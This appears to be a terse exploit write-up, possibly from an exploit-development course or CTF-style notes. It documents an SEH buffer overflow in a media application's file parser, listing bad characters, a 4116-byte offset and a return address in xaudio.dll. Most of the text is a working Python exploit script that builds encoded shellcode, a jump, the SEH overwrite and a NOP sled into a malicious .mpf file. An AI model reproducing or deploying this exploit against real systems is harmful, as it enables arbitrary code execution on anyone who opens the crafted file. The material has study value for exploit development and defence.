badchar
omitted
\x00\x0a\x0d\x1a
offset
omitted
4116
return address
seh
omitted
xaudio.dll
0x1001f668
shellcode
exploit.py
exploit.py1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42
| shellcode = b"" shellcode += b"\xb8\xcb\xdf\x29\x1c\xda\xc7\xd9\x74\x24\xf4" shellcode += b"\x5a\x33\xc9\xb1\x52\x31\x42\x12\x83\xea\xfc" shellcode += b"\x03\x89\xd1\xcb\xe9\xf1\x06\x89\x12\x09\xd7" shellcode += b"\xee\x9b\xec\xe6\x2e\xff\x65\x58\x9f\x8b\x2b" shellcode += b"\x55\x54\xd9\xdf\xee\x18\xf6\xd0\x47\x96\x20" shellcode += b"\xdf\x58\x8b\x11\x7e\xdb\xd6\x45\xa0\xe2\x18" shellcode += b"\x98\xa1\x23\x44\x51\xf3\xfc\x02\xc4\xe3\x89" shellcode += b"\x5f\xd5\x88\xc2\x4e\x5d\x6d\x92\x71\x4c\x20" shellcode += b"\xa8\x2b\x4e\xc3\x7d\x40\xc7\xdb\x62\x6d\x91" shellcode += b"\x50\x50\x19\x20\xb0\xa8\xe2\x8f\xfd\x04\x11" shellcode += b"\xd1\x3a\xa2\xca\xa4\x32\xd0\x77\xbf\x81\xaa" shellcode += b"\xa3\x4a\x11\x0c\x27\xec\xfd\xac\xe4\x6b\x76" shellcode += b"\xa2\x41\xff\xd0\xa7\x54\x2c\x6b\xd3\xdd\xd3" shellcode += b"\xbb\x55\xa5\xf7\x1f\x3d\x7d\x99\x06\x9b\xd0" shellcode += b"\xa6\x58\x44\x8c\x02\x13\x69\xd9\x3e\x7e\xe6" shellcode += b"\x2e\x73\x80\xf6\x38\x04\xf3\xc4\xe7\xbe\x9b" shellcode += b"\x64\x6f\x19\x5c\x8a\x5a\xdd\xf2\x75\x65\x1e" shellcode += b"\xdb\xb1\x31\x4e\x73\x13\x3a\x05\x83\x9c\xef" shellcode += b"\x8a\xd3\x32\x40\x6b\x83\xf2\x30\x03\xc9\xfc" shellcode += b"\x6f\x33\xf2\xd6\x07\xde\x09\xb1\xe7\xb7\x10" shellcode += b"\x18\x80\xc5\x12\x9b\xeb\x43\xf4\xf1\x1b\x02" shellcode += b"\xaf\x6d\x85\x0f\x3b\x0f\x4a\x9a\x46\x0f\xc0" shellcode += b"\x29\xb7\xde\x21\x47\xab\xb7\xc1\x12\x91\x1e" shellcode += b"\xdd\x88\xbd\xfd\x4c\x57\x3d\x8b\x6c\xc0\x6a" shellcode += b"\xdc\x43\x19\xfe\xf0\xfa\xb3\x1c\x09\x9a\xfc" shellcode += b"\xa4\xd6\x5f\x02\x25\x9a\xe4\x20\x35\x62\xe4" shellcode += b"\x6c\x61\x3a\xb3\x3a\xdf\xfc\x6d\x8d\x89\x56" shellcode += b"\xc1\x47\x5d\x2e\x29\x58\x1b\x2f\x64\x2e\xc3" shellcode += b"\x9e\xd1\x77\xfc\x2f\xb6\x7f\x85\x4d\x26\x7f" shellcode += b"\x5c\xd6\x56\xca\xfc\x7f\xff\x93\x95\x3d\x62" shellcode += b"\x24\x40\x01\x9b\xa7\x60\xfa\x58\xb7\x01\xff" shellcode += b"\x25\x7f\xfa\x8d\x36\xea\xfc\x22\x36\x3f"
payload = "A" * (4116 - 4) payload += "\xeb\x26\x41\x41" payload += "\x68\xf6\x01\x10" payload += "\x90" * 32 payload += shellcode
with open("exploit.mpf", "w") as fp: fp.write(payload)
|
proof
Open File(s)...